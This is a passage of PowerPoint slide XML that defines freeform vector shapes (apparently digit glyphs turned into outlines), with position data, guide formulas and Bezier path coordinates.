                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2079AE-56BF-4AEE-AB14-159D625D0635}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6253164" y="3267075"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 232"/>
                <a:gd name="T1" fmla="*/ 189 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 206 h 310"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 226 h 310"/>
                <a:gd name="T6" fmla="*/ 146 w 232"/>
                <a:gd name="T7" fmla="*/ 226 h 310"/>
                <a:gd name="T8" fmla="*/ 146 w 232"/>
                <a:gd name="T9" fmla="*/ 280 h 310"/>
                <a:gd name="T10" fmla="*/ 115 w 232"/>
                <a:gd name="T11" fmla="*/ 280 h 310"/>
                <a:gd name="T12" fmla="*/ 95 w 232"/>
                <a:gd name="T13" fmla="*/ 295 h 310"/>
                <a:gd name="T14" fmla="*/ 115 w 232"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 205 w 232"/>
                <a:gd name="T17" fmla="*/ 310 h 310"/>
                <a:gd name="T18" fmla="*/ 225 w 232"/>
                <a:gd name="T19" fmla="*/ 295 h 310"/>
                <a:gd name="T20" fmla="*/ 205 w 232"/>
                <a:gd name="T21" fmla="*/ 280 h 310"/>
                <a:gd name="T22" fmla="*/ 174 w 232"/>
                <a:gd name="T23" fmla="*/ 280 h 310"/>
                <a:gd name="T24" fmla="*/ 174 w 232"/>
                <a:gd name="T25" fmla="*/ 226 h 310"/>
                <a:gd name="T26" fmla="*/ 213 w 232"/>
                <a:gd name="T27" fmla="*/ 226 h 310"/>
                <a:gd name="T28" fmla="*/ 232 w 232"/>
                <a:gd name="T29" fmla="*/ 211 h 310"/>
                <a:gd name="T30" fmla="*/ 213 w 232"/>
                <a:gd name="T31" fmla="*/ 196 h 310"/>
                <a:gd name="T32" fmla="*/ 174 w 232"/>
                <a:gd name="T33" fmla="*/ 196 h 310"/>
                <a:gd name="T34" fmla="*/ 174 w 232"/>
                <a:gd name="T35" fmla="*/ 20 h 310"/>
                <a:gd name="T36" fmla="*/ 153 w 232"/>
                <a:gd name="T37" fmla="*/ 0 h 310"/>
                <a:gd name="T38" fmla="*/ 139 w 232"/>
                <a:gd name="T39" fmla="*/ 0 h 310"/>
                <a:gd name="T40" fmla="*/ 118 w 232"/>
                <a:gd name="T41" fmla="*/ 10 h 310"/>
                <a:gd name="T42" fmla="*/ 5 w 232"/>
                <a:gd name="T43" fmla="*/ 189 h 310"/>
                <a:gd name="T44" fmla="*/ 35 w 232"/>
                <a:gd name="T45" fmla="*/ 196 h 310"/>
                <a:gd name="T46" fmla="*/ 146 w 232"/>
                <a:gd name="T47" fmla="*/ 22 h 310"/>
                <a:gd name="T48" fmla="*/ 146 w 232"/>
                <a:gd name="T49" fmla="*/ 196 h 310"/>
                <a:gd name="T50" fmla="*/ 35 w 232"/>
                <a:gd name="T51" fmla="*/ 19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310">
                  <a:moveTo>
                    <a:pt x="5" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="5" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="280"/>
                    <a:pt x="95" y="280"/>
                    <a:pt x="95" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="310"/>
                    <a:pt x="107" y="310"/>
                    <a:pt x="115" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="205" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="310"/>
                    <a:pt x="225" y="310"/>
                    <a:pt x="225" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="280"/>
                    <a:pt x="213" y="280"/>
                    <a:pt x="205" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="232" y="226"/>
                    <a:pt x="232" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="196"/>
                    <a:pt x="221" y="196"/>
                    <a:pt x="213" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="125" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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8" name="Freeform 240">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052EDDC6-3764-471F-AFA9-9C64154617D2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386514" y="3365500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9" name="Freeform 241">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29634533-B7D3-4600-9C59-B759527AE6C1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6457951" y="3267075"/>
              <a:ext cx="80963" cy="123825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7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5 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 117 w 209"/>
                <a:gd name="T37" fmla="*/ 189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5" y="255"/>
                    <a:pt x="133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8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5" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="95" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="150" y="161"/>
                    <a:pt x="117" y="189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0" name="Freeform 242">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA213A02-992D-4D28-BBA8-44D02F5F9A58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6557964" y="3270250"/>
              <a:ext cx="80963" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 210"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 53 w 210"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 53 w 210"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 210"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 210"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 210"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 210"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 210"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 210"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 210"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 210"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 210"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 210"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 45 w 210"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 23 w 210"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 210"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 210"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 210 w 210"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 210"/>
                <a:gd name="T41" fmla="*/ 1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310">
                  <a:moveTo>
                    <a:pt x="112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73" y="114"/>
                    <a:pt x="53" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="180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2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3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50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1" y="246"/>
                    <a:pt x="45" y="242"/>
                    <a:pt x="45" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="218"/>
                    <a:pt x="33" y="210"/>
                    <a:pt x="23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10" y="265"/>
                    <a:pt x="210" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="11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1" name="Freeform 243">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30653701-8809-40FC-89FA-C1503A6CE9CA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6657976" y="3267075"/>
              <a:ext cx="80963" cy="123825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7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5 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 117 w 209"/>
                <a:gd name="T37" fmla="*/ 189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5" y="255"/>
                    <a:pt x="133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8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5" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="95" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="150" y="161"/>
                    <a:pt x="117" y="189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2" name="Freeform 244">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0983E33-933F-4904-A4C3-EA8F109CA357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6759576" y="3303588"/>
              <a:ext cx="77788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3" name="Freeform 245">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906F2CEB-5BB9-43F4-8E4D-65FBC825D2D3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6858001" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 217"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 206 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 197 w 217"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="97" y="312"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="206" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="205" y="8"/>
                    <a:pt x="197" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166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4" name="Freeform 246">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DA7F05-1E62-4F25-BC70-C7C115390F2F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6958014" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 218"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 42 w 218"/>
                <a:gd name="T3" fmla="*/ 80 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 31 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 218"/>
                <a:gd name="T7" fmla="*/ 80 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 218"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 149 w 218"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 211 w 218"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 218"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 218"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 70 w 218"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 224 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 218"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 218 w 218"/>
                <a:gd name="T25" fmla="*/ 224 h 316"/>
                <a:gd name="T26" fmla="*/ 149 w 218"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 218"/>
                <a:gd name="T29" fmla="*/ 285 h 316"/>
                <a:gd name="T30" fmla="*/ 35 w 218"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 218"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 218"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 218"/>
                <a:gd name="T3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16">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="42" y="108"/>
                    <a:pt x="42" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="55"/>
                    <a:pt x="70" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="31"/>
                    <a:pt x="176" y="55"/>
                    <a:pt x="176" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="146" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="211" y="108"/>
                    <a:pt x="211" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="40"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="108"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="70" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="47" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="316"/>
                    <a:pt x="218" y="272"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="149" y="146"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="285"/>
                    <a:pt x="35" y="258"/>
                    <a:pt x="35" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="193"/>
                    <a:pt x="64" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="258"/>
                    <a:pt x="151" y="285"/>
                    <a:pt x="109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5" name="Freeform 247">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB940338-9826-4246-A9EE-139E8A9FA77B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7059614" y="3267075"/>
              <a:ext cx="80963" cy="123825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7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6 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 118 w 209"/>
                <a:gd name="T37" fmla="*/ 189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6" y="255"/>
                    <a:pt x="134" y="217"/>
                    <a:pt x="155" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="209" y="137"/>
                    <a:pt x="209" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="38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5" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="96" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="151" y="161"/>
                    <a:pt x="118" y="189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6" name="Freeform 248">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE3DE73-24C3-4373-AB71-507802512177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7159626" y="3270250"/>
              <a:ext cx="80963" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 209"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 209"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 209"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 209"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 209"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 209"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 37 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 17 w 209"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 17 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 48 w 209"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 111 w 209"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 209"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 97 w 209"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 37 w 209"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 44 w 209"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 22 w 209"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 209"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 97 w 209"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 209 w 209"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 209"/>
                <a:gd name="T41" fmla="*/ 1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112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="110"/>
                    <a:pt x="72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7" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="4"/>
                    <a:pt x="17" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="17" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="162"/>
                    <a:pt x="17" y="173"/>
                    <a:pt x="33" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="173"/>
                    <a:pt x="44" y="171"/>
                    <a:pt x="48" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="150"/>
                    <a:pt x="82" y="141"/>
                    <a:pt x="111" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="250"/>
                    <a:pt x="139" y="279"/>
                    <a:pt x="97" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="279"/>
                    <a:pt x="51" y="275"/>
                    <a:pt x="37" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="246"/>
                    <a:pt x="44" y="242"/>
                    <a:pt x="44" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="218"/>
                    <a:pt x="32" y="210"/>
                    <a:pt x="22" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="210"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="41" y="310"/>
                    <a:pt x="97" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="209" y="265"/>
                    <a:pt x="209" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="11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7" name="Freeform 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3A7364-10EE-4C4B-A968-C80844456C32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7288214" y="3365500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8" name="Freeform 250">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84033C26-3ADA-4B73-8A47-BB313350D520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7359651" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 62 w 217"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 206 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 197 w 217"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 32 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
